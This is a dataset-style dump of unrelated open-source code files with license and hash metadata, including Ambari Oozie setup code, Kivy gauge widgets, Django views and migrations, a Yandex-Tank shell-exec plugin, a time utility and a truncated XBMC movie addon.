File(params.previous_jdbc_jar, action='delete') # if the target directory is not specified if target_directory is None: target_jar_with_directory = params.target else: # create the full path using the supplied target directory and the JDBC JAR target_jar_with_directory = target_directory + os.path.sep + params.jdbc_driver_jar if not os.path.exists(target_jar_with_directory): File(params.downloaded_custom_connector, content = DownloadSource(params.driver_curl_source)) if params.sqla_db_used: untar_sqla_type2_driver = ('tar', '-xvf', params.downloaded_custom_connector, '-C', params.tmp_dir) Execute(untar_sqla_type2_driver, sudo = True) Execute(format("yes | {sudo} cp {jars_path_in_archive} {oozie_libext_dir}")) Directory(params.jdbc_libs_dir, create_parents = True) Execute(format("yes | {sudo} cp {libs_path_in_archive} {jdbc_libs_dir}")) Execute(format("{sudo} chown -R {oozie_user}:{user_group} {oozie_libext_dir}/*")) else: Execute(('cp', '--remove-destination', params.downloaded_custom_connector, target_jar_with_directory), path=["/bin", "/usr/bin/"], sudo = True) File(target_jar_with_directory, owner = params.oozie_user, group = params.user_group)
apache-2.0
5,204,235,272,387,705,000
41.728597
262
0.665956
false
3.656742
true
false
false
jorisvandenbossche/ircelsos
ircelsos/tests/test_util.py
1
1165
# -*- coding: utf-8 -*- from __future__ import print_function, division import unittest import pytest from ircelsos.util import print_stations, print_pollutants from ircelsos import metadata def strip(s): s = s.splitlines() s = [line.strip() for line in s] s = "\n".join(s) return s @pytest.mark.usefixtures("capsys") class TestTablePrinting(): def test_print_stations(self, capsys): print_stations(['BETR801', 'BETR802']) out, err = capsys.readouterr() expected = """name | EU_code | location | region | type -------+---------+------------+--------+-------- 42R801 | BETR801 | Borgerhout | urban | Traffic 42R802 | BETR802 | Borgerhout | urban | Traffic """ assert strip(out) == strip(expected) def test_print_pollutants(self, capsys): print_pollutants(['42602 - NO2', '44201 - O3']) out, err = capsys.readouterr() expected = """id | short | name | stations ------------+-------+------------------+--------- 42602 - NO2 | no2 | Nitrogen dioxide | 105 44201 - O3 | o3 | Ozone | 47 """ assert strip(out) == strip(expected)
bsd-2-clause
5,899,053,136,330,087,000
26.738095
71
0.556223
false
3.25419
true
false
false
PhilipHomburg/ripe.atlas.sagan
ripe/atlas/sagan/http.py
1
2943
from .base import Result, ValidationMixin class Response(ValidationMixin): def __init__(self, data, **kwargs): ValidationMixin.__init__(self, **kwargs) self.raw_data = data self.af = self.ensure("af", int) self.body_size = self.ensure("bsize", int) self.head_size = self.ensure("hsize", int) self.destination_address = self.ensure("dst_addr", str) self.source_address = self.ensure("src_addr", str) self.code = self.ensure("res", int) self.response_time = self.ensure("rt", float) self.version = self.ensure("ver", str) if not self.destination_address: self.destination_address = self.ensure("addr", str, self.destination_address) if not self.source_address: self.source_address = self.ensure("srcaddr", str, self.source_address) if not self.code: self._handle_malformation("No response code available") error = self.ensure("err", str) if error: self._handle_error(error) class HttpResult(Result): METHOD_GET = "GET" METHOD_POST = "POST" METHOD_PUT = "PUT" METHOD_DELETE = "DELETE" METHOD_HEAD = "HEAD" METHODS = { METHOD_GET: "GET", METHOD_POST: "POST", METHOD_PUT: "PUT", METHOD_DELETE: "DELETE", METHOD_HEAD: "HEAD" } def __init__(self, data, **kwargs): Result.__init__(self, data, **kwargs) self.uri = self.ensure("uri", str) self.method = None self.responses = [] if "result" not in self.raw_data: self._handle_malformation("No result value found") return if isinstance(self.raw_data["result"], list): # All modern results for response in self.raw_data["result"]: self.responses.append(Response(response, **kwargs)) if self.responses: method = self.raw_data["result"][0].get( "method", self.raw_data["result"][0].get("mode") # Firmware == 4300 ) if method: method = method.replace("4", "").replace("6", "") if method in self.METHODS.keys(): self.method = self.METHODS[method] else: # Firmware <= 1 response = self.raw_data["result"].split(" ") self.method = response[0].replace("4", "").replace("6", "") self.responses.append(Response({ "dst_addr": response[1], "rt": float(response[2]) * 1000, "res": int(response[3]), "hsize": int(response[4]), "bsize": int(response[5]), })) __all__ = ( "HttpResult" )
gpl-3.0
4,170,459,175,948,925,000
29.978947
89
0.49983
false
3.982409
false
false
false
autosportlabs/RaceCapture_App
autosportlabs/racecapture/widgets/heat/heatgauge.py
1
6048
# # Race Capture App # # Copyright (C) 2014-2017 Autosport Labs # # This file is part of the Race Capture App # # This is free software: you can redistribute it and/or modify it # under the terms of the GNU General Public License as published by # the Free Software Foundation, either version 3 of the License, or # (at your option) any later version. # # This software is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. # # See the GNU General Public License for more details. You should # have received a copy of the GNU General Public License along with # this code. If not, see <http://www.gnu.org/licenses/>. import kivy kivy.require('1.10.0') from kivy.uix.anchorlayout import AnchorLayout from kivy.app import Builder from kivy.graphics import * from kivy.properties import NumericProperty, ListProperty, StringProperty from kivy.logger import Logger from autosportlabs.uix.color.colorgradient import HeatColorGradient from kivy.core.image import Image as CoreImage HEAT_GAUGE_KV = """ <TireHeatGauge>: """ class BrakeHeatGauge(AnchorLayout): Builder.load_string(HEAT_GAUGE_KV) zones = NumericProperty(None) CENTER_SIZE_PCT = 0.5 ROTOR_IMAGE = CoreImage('autosportlabs/racecapture/widgets/heat/rotor.png') TIRE_IMAGE = CoreImage('autosportlabs/racecapture/widgets/heat/tire.png') def __init__(self, **kwargs): super(BrakeHeatGauge, self).__init__(**kwargs) self.heat_gradient = HeatColorGradient() self.colors = [] self.values = [] self._init_view() self.bind(pos=self._update_gauge) self.bind(size=self._update_gauge) self.bind(zones=self._update_gauge) def on_zones(self, instance, value): self._sync_zones() def _init_view(self): self._sync_zones() def _sync_zones(self): zones = self.zones if zones is None: return values = self.values values.extend([0] * (zones - len(values))) colors = self.colors colors.extend([Color()] * (zones - len(colors))) self._update_gauge() def set_value(self, zone, value): try: rgba = self.heat_gradient.get_color_value(value) self.colors[zone].rgba = rgba self.values[zone] = value except IndexError: pass def _update_gauge(self, *args): self.canvas.clear() zones = self.zones if zones is None or zones == 0: return x = self.pos[0] y = self.pos[1] width = self.size[0] height = self.size[1] min_size = min(width, height) center_size = min_size * BrakeHeatGauge.CENTER_SIZE_PCT rw = ((min_size - center_size) / float(zones)) center_x = x + (width / 2) center_y = y + (height / 2) index = zones with self.canvas: for i in range(0, zones): color = self.heat_gradient.get_color_value(self.values[index - 1]) c = Color(rgba=color) self.colors[index - 1] = c segment_size = (index * (rw)) + center_size c_x = center_x - segment_size / 2 c_y = center_y - segment_size / 2 Ellipse(pos=(c_x, c_y), size=(segment_size, segment_size)) index -= 1 Color(1.0, 1.0, 1.0, 1.0) r_x = center_x - (center_size / 2) r_y = center_y - (center_size / 2) Rectangle(texture=BrakeHeatGauge.ROTOR_IMAGE.texture, pos=(r_x, r_y), size=(center_size, center_size)) def on_values(self, instance, value): pass class TireHeatGauge(AnchorLayout): Builder.load_string(HEAT_GAUGE_KV) zones = NumericProperty(None) direction = StringProperty('left-right') def __init__(self, **kwargs): super(TireHeatGauge, self).__init__(**kwargs) self.heat_gradient = HeatColorGradient() self.colors = [] self.values = [] self._init_view() self.bind(pos=self._update_gauge) self.bind(size=self._update_gauge) self.bind(zones=self._update_gauge) self.bind(direction=self._update_gauge) def on_zones(self, instance, value): self._sync_zones() def _init_view(self): self._sync_zones() def _sync_zones(self): zones = self.zones if zones is None: return values = self.values values.extend([0] * (zones - len(values))) colors = self.colors colors.extend([Color()] * (zones - len(colors))) self._update_gauge() def set_value(self, zone, value): try: rgba = self.heat_gradient.get_color_value(value) self.colors[zone].rgba = rgba self.values[zone] = value except IndexError: pass def _update_gauge(self, *args): self.canvas.clear() zones = self.zones if zones is None or zones == 0: return x = self.pos[0] y = self.pos[1] width = self.size[0] height = self.size[1] rw = width / float(zones) if self.direction == 'left-right': index = 0 index_dir = 1 elif self.direction == 'right-left': index = zones - 1 index_dir = -1 else: raise Exception('Invalid direction {}'.self.dir) with self.canvas: for i in range(0, zones): xp = x + (rw * i) color = self.heat_gradient.get_color_value(self.values[index]) c = Color(rgba=color) self.colors[index] = c Rectangle(pos=(xp, y), size=(rw, height)) index += index_dir Color(rgba=(0.0, 0.0, 0.0, 1.0)) Rectangle(texture=BrakeHeatGauge.TIRE_IMAGE.texture, pos=(x, y), size=(width, height)) def on_values(self, instance, value): pass
gpl-3.0
8,670,585,709,165,813,000
30.831579
114
0.582837
false
3.64118
false
false
false
stencila/hub
manager/projects/ui/views/reviews.py
1
1679
from django.http import HttpRequest, HttpResponse from django.shortcuts import render from projects.api.serializers import ReviewUpdateSerializer from projects.api.views.reviews import ProjectsReviewsViewSet def list(request: HttpRequest, *args, **kwargs) -> HttpResponse: """ List reviews for a project. """ viewset = ProjectsReviewsViewSet.init("list", request, args, kwargs) reviews = viewset.get_queryset() context = viewset.get_response_context(queryset=reviews) meta = viewset.get_project().get_meta() return render(request, "projects/reviews/list.html", dict(**context, meta=meta)) def create(request: HttpRequest, *args, **kwargs) -> HttpResponse: """ Create a review for a project. """ viewset = ProjectsReviewsViewSet.init("create", request, args, kwargs) serializer = viewset.get_serializer() context = viewset.get_response_context(serializer=serializer) meta = viewset.get_project().get_meta() return render(request, "projects/reviews/create.html", dict(**context, meta=meta)) def retrieve(request: HttpRequest, *args, **kwargs) -> HttpResponse: """ Retrieve a review from a project. """ viewset = ProjectsReviewsViewSet.init("retrieve", request, args, kwargs) review = viewset.get_object() context = viewset.get_response_context(instance=review) serializer = ( ReviewUpdateSerializer() if context.get("is_editor") or context.get("is_user") else None ) meta = viewset.get_project().get_meta() return render( request, "projects/reviews/retrieve.html", dict(**context, serializer=serializer, meta=meta), )
apache-2.0
-6,900,870,597,921,345,000
34.723404
86
0.69327
false
3.950588
false
false
false
mxmaslin/Test-tasks
tests_django/apps/playschool/migrations/0001_initial.py
1
1954
# Generated by Django 2.1.1 on 2018-09-29 17:59 import django.core.validators from django.db import migrations, models import django.db.models.deletion class Migration(migrations.Migration): initial = True dependencies = [ ] operations = [ migrations.CreateModel( name='Record', fields=[ ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')), ('date', models.DateField(auto_now_add=True)), ('has_came_with', models.CharField(choices=[('M', 'Mother'), ('F', 'Father')], default='M', max_length=1)), ('time_arrived', models.DateTimeField()), ('time_departed', models.DateTimeField()), ], options={ 'ordering': ('-date',), }, ), migrations.CreateModel( name='Scholar', fields=[ ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')), ('photo', models.ImageField(blank=True, null=True, upload_to='playschool/images/%Y/%m/%d')), ('name', models.CharField(max_length=50)), ('sex', models.CharField(choices=[('M', 'Boy'), ('F', 'Girl')], default='F', max_length=1)), ('birth_date', models.DateField()), ('school_class', models.PositiveIntegerField(default=1, validators=[django.core.validators.MinValueValidator(1), django.core.validators.MaxValueValidator(11)])), ('is_studying', models.BooleanField()), ], options={ 'ordering': ('school_class', 'name'), }, ), migrations.AddField( model_name='record', name='scholar', field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='playschool.Scholar'), ), ]
gpl-3.0
5,469,782,674,536,385,000
38.877551
177
0.547083
false
4.211207
false
false
false
handsomegui/Gereqi
gereqi/Ui_about.py
1
4402
# -*- coding: utf-8 -*- # Form implementation generated from reading ui file 'about.ui' # # Created: Fri Sep 10 23:16:30 2010 # by: PyQt4 UI code generator 4.7.3 # # WARNING! All changes made in this file will be lost! from PyQt4 import QtCore, QtGui class Ui_About(object): def setupUi(self, About): About.setObjectName("About") About.resize(253, 309) icon = QtGui.QIcon() icon.addPixmap(QtGui.QPixmap(":/Icons/app.png"), QtGui.QIcon.Normal, QtGui.QIcon.Off) About.setWindowIcon(icon) self.gridLayout = QtGui.QGridLayout(About) self.gridLayout.setObjectName("gridLayout") self.buttonBox = QtGui.QDialogButtonBox(About) self.buttonBox.setOrientation(QtCore.Qt.Horizontal) self.buttonBox.setStandardButtons(QtGui.QDialogButtonBox.Close) self.buttonBox.setObjectName("buttonBox") self.gridLayout.addWidget(self.buttonBox, 1, 0, 1, 1) self.textBrowser = QtGui.QTextBrowser(About) self.textBrowser.setStyleSheet("background-color: rgba(255, 255, 255, 0);") self.textBrowser.setFrameShape(QtGui.QFrame.NoFrame) self.textBrowser.setFrameShadow(QtGui.QFrame.Plain) self.textBrowser.setTabChangesFocus(True) self.textBrowser.setAcceptRichText(False) self.textBrowser.setTextInteractionFlags(QtCore.Qt.LinksAccessibleByMouse) self.textBrowser.setOpenExternalLinks(True) self.textBrowser.setOpenLinks(False) self.textBrowser.setObjectName("textBrowser") self.gridLayout.addWidget(self.textBrowser, 0, 0, 1, 1) self.retranslateUi(About) QtCore.QObject.connect(self.buttonBox, QtCore.SIGNAL("accepted()"), About.accept) QtCore.QObject.connect(self.buttonBox, QtCore.SIGNAL("rejected()"), About.reject) QtCore.QMetaObject.connectSlotsByName(About) def retranslateUi(self, About): About.setWindowTitle(QtGui.QApplication.translate("About", "About Gereqi", None, QtGui.QApplication.UnicodeUTF8)) self.textBrowser.setHtml(QtGui.QApplication.translate("About", "<!DOCTYPE HTML PUBLIC \"-//W3C//DTD HTML 4.0//EN\" \"http://www.w3.org/TR/REC-html40/strict.dtd\">\n" "<html><head><meta name=\"qrichtext\" content=\"1\" /><style type=\"text/css\">\n" "p, li { white-space: pre-wrap; }\n" "</style></head><body style=\" font-family:\'Droid Sans\'; font-size:10pt; font-weight:400; font-style:normal;\">\n" "<p align=\"right\" style=\" margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\"><img src=\":/Icons/app.png\" /></p>\n" "<p style=\"-qt-paragraph-type:empty; margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px; font-size:18pt; font-weight:600;\"></p>\n" "<p style=\" margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\"><span style=\" font-size:18pt; font-weight:600;\">Gereqi</span></p>\n" "<p style=\"-qt-paragraph-type:empty; margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\"></p>\n" "<p style=\" margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\">version 0.4.2</p>\n" "<p style=\"-qt-paragraph-type:empty; margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\"></p>\n" "<p style=\" margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\">© 2009,2010 Contributors</p>\n" "<p style=\"-qt-paragraph-type:empty; margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\"></p>\n" "<p style=\"-qt-paragraph-type:empty; margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\"></p>\n" "<p style=\"-qt-paragraph-type:empty; margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\"></p>\n" "<p style=\" margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\">Visit <a href=\"http://code.google.com/p/gereqi/\"><span style=\" text-decoration: underline; color:#e85290;\">http://code.google.com/p/gereqi/</span></a></p></body></html>", None, QtGui.QApplication.UnicodeUTF8))
gpl-3.0
-5,543,503,231,855,172,000
72.35
335
0.696887
false
2.993878
false
false
false
nnugumanov/yandex-tank
yandextank/plugins/ShellExec/plugin.py
1
2286
''' Contains shellexec plugin ''' from ...common import util from ...common.interfaces import AbstractPlugin class Plugin(AbstractPlugin): ''' ShellExec plugin allows executing shell scripts before/after test ''' SECTION = 'shellexec' def __init__(self, core, config_section): AbstractPlugin.__init__(self, core, config_section) self.catch_out = False self.end = None self.poll = None self.prepare = None self.start = None self.postprocess = None @staticmethod def get_key(): return __file__ def get_available_options(self): return ["prepare", "start", "end", "poll", "post_process", "catch_out"] def configure(self): self.catch_out = True if self.get_option("catch_out", False) else False self.prepare = self.get_option("prepare", '') self.start = self.get_option("start", '') self.end = self.get_option("end", '') self.poll = self.get_option("poll", '') self.postprocess = self.get_option("post_process", '') def prepare_test(self): if self.prepare: self.execute(self.prepare) def start_test(self): if self.start: self.execute(self.start) def is_test_finished(self): if self.poll: self.log.info("Executing: %s", self.poll) retcode = util.execute( self.poll, shell=True, poll_period=0.1, catch_out=self.catch_out)[0] if retcode: self.log.warn( "Non-zero exit code, interrupting test: %s", retcode) return retcode return -1 def end_test(self, retcode): if self.end: self.execute(self.end) return retcode def post_process(self, retcode): if self.postprocess: self.execute(self.postprocess) return retcode def execute(self, cmd): ''' Execute and check exit code ''' self.log.info("Executing: %s", cmd) retcode = util.execute( cmd, shell=True, poll_period=0.1, catch_out=self.catch_out)[0] if retcode: raise RuntimeError("Subprocess returned %s" % retcode)
lgpl-2.1
941,401,629,749,793,200
27.936709
79
0.559055
false
4.031746
true
false
false
Jackeriss/Typora-Blog
app/util/time_util.py
1
3493
import functools import logging import time from datetime import datetime import pytz from app.util.config_util import config def str2datetime(value, default=None, time_format="%Y-%m-%d %H:%M:%S"): try: return datetime.strptime(value, time_format) except Exception as exception: logging.exception(f"str2datetime failed!value:{value} exception:{exception}") return default def time_str2timestamp(time_str): if ":" in time_str: if "/" in time_str: return ( time_str.split("/")[0], time.mktime( datetime.strptime(time_str, "%Y/%m/%d %H:%M:%S").timetuple() ), ) return ( time_str.split("-")[0], time.mktime(datetime.strptime(time_str, "%Y-%m-%d %H:%M:%S").timetuple()), ) elif "/" in time_str: return ( time_str.split("/")[0], time.mktime(datetime.strptime(time_str, "%Y/%m/%d %H-%M-%S").timetuple()), ) else: return ( time_str.split("-")[0], time.mktime(datetime.strptime(time_str, "%Y-%m-%d %H-%M-%S").timetuple()), ) def str2timestamp(value, default=0, time_format="%Y-%m-%d %H:%M:%S"): try: return datetime.strptime(value, time_format).timestamp() * 1000 except Exception as exception: logging.exception(f"str2timestamp failed!value:{value} exception:{exception}") return default def timestamp2str(value, time_format="%Y-%m-%d %H:%M:%S"): if not value: return "" try: return datetime.fromtimestamp(value, pytz.UTC).strftime(time_format) except Exception as exception: logging.exception(f"timestamp2str failed!value:{value} exception:{exception}") return "" def datetime2str(value, default="", time_format="%Y-%m-%d %H:%M:%S"): if not isinstance(value, datetime): return default try: locale.setlocale(locale.LC_TIME, "en_US.UTF-8") return value.strftime(time_format) except Exception as exception: logging.exception(f"datetime2str failed!value:{value} exception:{exception}") return default def timestamp(): """ 获取当前utc时间戳 """ return int(datetime.utcnow().timestamp()) def now(): """ 获取当前utc时间 """ return datetime.utcnow() def timeout_log(timeout=10, tag="", debug=False): """ 记录函数执行时间 timeout: 超过时长打印错误日志,单位(秒) tag: 日志记录标签 """ def decorator(func): def _time_log(time_start, time_end, function_name): if not debug and config.server["debug"]: return cost = (time_end - time_start).total_seconds() if cost > timeout: logging.error(f"TIME OUT:{tag}, function:{function_name}, cost:{cost}s") @functools.wraps(func) async def _async_wrapper(*args, **kwargs): start = now() result = await func(*args, **kwargs) _time_log(start, now(), func.__name__) return result @functools.wraps(func) def _sync_wrapper(*args, **kwargs): start = now() result = func(*args, **kwargs) _time_log(start, now(), func.__name__) return result if asyncio.iscoroutinefunction(func): return _async_wrapper return _sync_wrapper return decorator
mit
6,112,573,830,291,964,000
28.626087
88
0.57059
false
3.695228
false
false
false
SMALLplayer/smallplayer-image-creator
storage/.xbmc/addons/plugin.video.muchmovies.hd/default.py
1
51620
# -*- coding: utf-8 -*- ''' Much Movies HD XBMC Addon Copyright (C) 2014 lambda This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation, either version 3 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program. If not, see <http://www.gnu.org/licenses/>. ''' import urllib,urllib2,re,os,threading,datetime,xbmc,xbmcplugin,xbmcgui,xbmcaddon,xbmcvfs from operator import itemgetter try: import json except: import simplejson as json try: import CommonFunctions except: import commonfunctionsdummy as CommonFunctions from metahandler import metahandlers from metahandler import metacontainers language = xbmcaddon.Addon().getLocalizedString setSetting = xbmcaddon.Addon().setSetting getSetting = xbmcaddon.Addon().getSetting addonName = xbmcaddon.Addon().getAddonInfo("name") addonVersion = xbmcaddon.Addon().getAddonInfo("version") addonId = xbmcaddon.Addon().getAddonInfo("id") addonPath = xbmcaddon.Addon().getAddonInfo("path") addonDesc = language(30450).encode("utf-8") addonIcon = os.path.join(addonPath,'icon.png') addonFanart = os.path.join(addonPath,'fanart.jpg') addonArt = os.path.join(addonPath,'resources/art') addonDownloads = os.path.join(addonPath,'resources/art/Downloads.png') addonPages = os.path.join(addonPath,'resources/art/Pages.png') addonNext = os.path.join(addonPath,'resources/art/Next.png') dataPath = xbmc.translatePath('special://profile/addon_data/%s' % (addonId)) viewData = os.path.join(dataPath,'views.cfg') favData = os.path.join(dataPath,'favourites.cfg') metaget = metahandlers.MetaData(preparezip=False) common = CommonFunctions action = None class main: def __init__(self): global action index().container_data() params = {} splitparams = sys.argv[2][sys.argv[2].find('?') + 1:].split('&') for param in splitparams: if (len(param) > 0): splitparam = param.split('=') key = splitparam[0] try: value = splitparam[1].encode("utf-8") except: value = splitparam[1] params[key] = value try: action = urllib.unquote_plus(params["action"]) except: action = None try: name = urllib.unquote_plus(params["name"]) except: name = None try: url = urllib.unquote_plus(params["url"]) except: url = None try: image = urllib.unquote_plus(params["image"]) except: image = None try: query = urllib.unquote_plus(params["query"]) except: query = None try: title = urllib.unquote_plus(params["title"]) except: title = None try: year = urllib.unquote_plus(params["year"]) except: year = None try: imdb = urllib.unquote_plus(params["imdb"]) except: imdb = None if action == None: root().get() elif action == 'item_play': contextMenu().item_play() elif action == 'item_random_play': contextMenu().item_random_play() elif action == 'item_queue': contextMenu().item_queue() elif action == 'favourite_add': contextMenu().favourite_add(favData, name, url, image, imdb) elif action == 'favourite_from_search': contextMenu().favourite_from_search(favData, name, url, image, imdb) elif action == 'favourite_delete': contextMenu().favourite_delete(favData, name, url) elif action == 'favourite_moveUp': contextMenu().favourite_moveUp(favData, name, url) elif action == 'favourite_moveDown': contextMenu().favourite_moveDown(favData, name, url) elif action == 'playlist_open': contextMenu().playlist_open() elif action == 'settings_open': contextMenu().settings_open() elif action == 'addon_home': contextMenu().addon_home() elif action == 'view_movies': contextMenu().view('movies') elif action == 'metadata_movies': contextMenu().metadata('movie', name, url, imdb, '', '') elif action == 'metadata_movies2': contextMenu().metadata('movie', name, url, imdb, '', '') elif action == 'playcount_movies': contextMenu().playcount('movie', imdb, '', '') elif action == 'library': contextMenu().library(name, url) elif action == 'download': contextMenu().download(name, url) elif action == 'trailer': contextMenu().trailer(name, url) elif action == 'movies': movies().muchmovies(url) elif action == 'movies_title': movies().muchmovies_title() elif action == 'movies_release': movies().muchmovies_release() elif action == 'movies_added': movies().muchmovies_added() elif action == 'movies_rating': movies().muchmovies_rating() elif action == 'movies_search': movies().muchmovies_search(query) elif action == 'movies_favourites': favourites().movies() elif action == 'pages_movies': pages().muchmovies() elif action == 'genres_movies': genres().muchmovies() elif action == 'play': resolver().run(url, name) if action is None: pass elif action.startswith('movies'): xbmcplugin.setContent(int(sys.argv[1]), 'movies') index().container_view('movies', {'skin.confluence' : 500}) xbmcplugin.setPluginFanart(int(sys.argv[1]), addonFanart) xbmcplugin.endOfDirectory(int(sys.argv[1])) return class getUrl(object): def __init__(self, url, fetch=True, close=True, cookie=False, mobile=False, proxy=None, post=None, referer=None): if not proxy is None: proxy_handler = urllib2.ProxyHandler({'http':'%s' % (proxy)}) opener = urllib2.build_opener(proxy_handler, urllib2.HTTPHandler) opener = urllib2.install_opener(opener) if cookie == True: import cookielib cookie_handler = urllib2.HTTPCookieProcessor(cookielib.LWPCookieJar()) opener = urllib2.build_opener(cookie_handler, urllib2.HTTPBasicAuthHandler(), urllib2.HTTPHandler()) opener = urllib2.install_opener(opener) if not post is None: request = urllib2.Request(url, post) else: request = urllib2.Request(url,None) if mobile == True: request.add_header('User-Agent', 'Mozilla/5.0 (iPhone; U; CPU iPhone OS 4_0 like Mac OS X; en-us) AppleWebKit/532.9 (KHTML, like Gecko) Version/4.0.5 Mobile/8A293 Safari/6531.22.7') else: request.add_header('User-Agent', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:6.0) Gecko/20100101 Firefox/6.0') if not referer is None: request.add_header('Referer', referer) response = urllib2.urlopen(request, timeout=30) if fetch == True: result = response.read() else: result = response.geturl() if close == True: response.close() self.result = result class uniqueList(object): def __init__(self, list): uniqueSet = set() uniqueList = [] for n in list: if n not in uniqueSet: uniqueSet.add(n) uniqueList.append(n) self.list = uniqueList class Thread(threading.Thread): def __init__(self, target, *args): self._target = target self._args = args threading.Thread.__init__(self) def run(self): self._target(*self._args) class player(xbmc.Player): def __init__ (self): self.property = addonName+'player_status' xbmc.Player.__init__(self) def status(self): getProperty = index().getProperty(self.property) index().clearProperty(self.property) if not xbmc.getInfoLabel('Container.FolderPath') == '': return if getProperty == 'true': return True return def run(self, name, url, imdb='0'): if xbmc.getInfoLabel('Container.FolderPath').startswith(sys.argv[0]): item = xbmcgui.ListItem(path=url) xbmcplugin.setResolvedUrl(int(sys.argv[1]), True, item) else: try: file = name + '.strm' file = file.translate(None, '\/:*?"<>|') meta = xbmc.executeJSONRPC('{"jsonrpc": "2.0", "method": "VideoLibrary.GetMovies", "params": {"properties" : ["title", "genre", "year", "rating", "director", "trailer", "tagline", "plot", "plotoutline", "originaltitle", "lastplayed", "playcount", "writer", "studio", "mpaa", "country", "imdbnumber", "runtime", "votes", "fanart", "thumbnail", "file", "sorttitle", "resume", "dateadded"]}, "id": 1}') meta = unicode(meta, 'utf-8', errors='ignore') meta = json.loads(meta) meta = meta['result']['movies'] self.meta = [i for i in meta if i['file'].endswith(file)][0] meta = {'title': self.meta['title'], 'originaltitle': self.meta['originaltitle'], 'year': self.meta['year'], 'genre': str(self.meta['genre']).replace("[u'", '').replace("']", '').replace("', u'", ' / '), 'director': str(self.meta['director']).replace("[u'", '').replace("']", '').replace("', u'", ' / '), 'country': str(self.meta['country']).replace("[u'", '').replace("']", '').replace("', u'", ' / '), 'rating': self.meta['rating'], 'votes': self.meta['votes'], 'mpaa': self.meta['mpaa'], 'duration': self.meta['runtime'], 'trailer': self.meta['trailer'], 'writer': str(self.meta['writer']).replace("[u'", '').replace("']", '').replace("', u'", ' / '), 'studio': str(self.meta['studio']).replace("[u'", '').replace("']", '').replace("', u'", ' / '), 'tagline': self.meta['tagline'], 'plotoutline': self.meta['plotoutline'], 'plot': self.meta['plot']} poster = self.meta['thumbnail'] except: meta = {'label' : name, 'title' : name} poster = '' item = xbmcgui.ListItem(path=url, iconImage="DefaultVideo.png", thumbnailImage=poster) item.setInfo( type="Video", infoLabels= meta ) xbmcplugin.setResolvedUrl(int(sys.argv[1]), True, item) for i in range(1, 21): try: self.totalTime = self.getTotalTime() except: self.totalTime = 0 if not self.totalTime == 0: continue xbmc.sleep(1000) if self.totalTime == 0: return subtitles().get(name) self.content = 'movie' self.season = str(xbmc.getInfoLabel('VideoPlayer.season')) self.episode = str(xbmc.getInfoLabel('VideoPlayer.episode')) if imdb == '0': imdb = metaget.get_meta('movie', xbmc.getInfoLabel('VideoPlayer.title') ,year=str(xbmc.getInfoLabel('VideoPlayer.year')))['imdb_id'] imdb = re.sub("[^0-9]", "", imdb) self.imdb = imdb while True: try: self.currentTime = self.getTime() except: break xbmc.sleep(1000) def onPlayBackEnded(self): if xbmc.getInfoLabel('Container.FolderPath') == '': index().setProperty(self.property, 'true') if not self.currentTime / self.totalTime >= .9: return if xbmc.getInfoLabel('Container.FolderPath').startswith(sys.argv[0]): metaget.change_watched(self.content, '', self.imdb, season=self.season, episode=self.episode, year='', watched='') index().container_refresh() else: try: xbmc.executeJSONRPC('{"jsonrpc": "2.0", "method": "VideoLibrary.SetMovieDetails", "params": {"movieid" : %s, "playcount" : 1 }, "id": 1 }' % str(self.meta['movieid'])) except: pass def onPlayBackStopped(self): index().clearProperty(self.property) if not self.currentTime / self.totalTime >= .9: return if xbmc.getInfoLabel('Container.FolderPath').startswith(sys.argv[0]): metaget.change_watched(self.content, '', self.imdb, season=self.season, episode=self.episode, year='', watched='') index().container_refresh() else: try: xbmc.executeJSONRPC('{"jsonrpc": "2.0", "method": "VideoLibrary.SetMovieDetails", "params": {"movieid" : %s, "playcount" : 1 }, "id": 1 }' % str(self.meta['movieid'])) except: pass class subtitles: def get(self, name): subs = getSetting("subs") if subs == '1': self.greek(name) def greek(self, name): try: import shutil, zipfile, time sub_tmp = os.path.join(dataPath,'sub_tmp') sub_tmp2 = os.path.join(sub_tmp, "subs") sub_stream = os.path.join(dataPath,'sub_stream') sub_file = os.path.join(sub_tmp, 'sub_tmp.zip') try: os.makedirs(dataPath) except: pass try: os.remove(sub_tmp) except: pass try: shutil.rmtree(sub_tmp) except: pass try: os.makedirs(sub_tmp) except: pass try: os.remove(sub_stream) except: pass try: shutil.rmtree(sub_stream) except: pass try: os.makedirs(sub_stream) except: pass subtitles = [] query = ''.join(e for e in name if e.isalnum() or e == ' ') query = urllib.quote_plus(query) url = 'http://www.greeksubtitles.info/search.php?name=' + query result = getUrl(url).result result = result.decode('iso-8859-7').encode('utf-8') result = result.lower().replace('"',"'") match = "get_greek_subtitles[.]php[?]id=(.+?)'.+?%s.+?<" quality = ['bluray', 'brrip', 'bdrip', 'dvdrip', 'hdtv'] for q in quality: subtitles += re.compile(match % q).findall(result) if subtitles == []: raise Exception() for subtitle in subtitles: url = 'http://www.findsubtitles.eu/getp.php?id=' + 